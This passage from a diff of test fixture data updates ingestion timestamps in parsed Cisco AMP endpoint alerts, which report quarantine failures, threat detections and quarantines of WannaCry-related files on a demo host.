Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1626,7 +1626,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763882300Z", + "ingested": "2021-12-14T14:40:45.520863328Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1702,7 +1702,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763886500Z", + "ingested": "2021-12-14T14:40:45.520863720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1778,7 +1778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763891900Z", + "ingested": "2021-12-14T14:40:45.520864199Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1854,7 +1854,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763897100Z", + "ingested": "2021-12-14T14:40:45.520864696Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1930,7 +1930,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763903200Z", + "ingested": "2021-12-14T14:40:45.520865091Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2006,7 +2006,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763909300Z", + "ingested": "2021-12-14T14:40:45.520865479Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2101,7 +2101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763919Z", + "ingested": "2021-12-14T14:40:45.520865898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2198,7 +2198,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763924600Z", + "ingested": "2021-12-14T14:40:45.520866292Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2299,7 +2299,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763931100Z", + "ingested": "2021-12-14T14:40:45.520866690Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2400,7 +2400,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763937100Z", + "ingested": "2021-12-14T14:40:45.520867149Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2478,7 +2478,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763941700Z", + "ingested": "2021-12-14T14:40:45.520867556Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", @@ -2550,7 +2550,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763946600Z", + "ingested": "2021-12-14T14:40:45.520867992Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", @@ -2622,7 +2622,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763952200Z", + "ingested": "2021-12-14T14:40:45.520868402Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "553648143", "kind": "alert", @@ -2694,7 +2694,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763957400Z", + "ingested": "2021-12-14T14:40:45.520868794Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "553648143", "kind": "alert", @@ -2766,7 +2766,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763963800Z", + "ingested": "2021-12-14T14:40:45.520869323Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -2838,7 +2838,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763969900Z", + "ingested": "2021-12-14T14:40:45.520869735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2914,7 +2914,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763975900Z", + "ingested": "2021-12-14T14:40:45.520870129Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 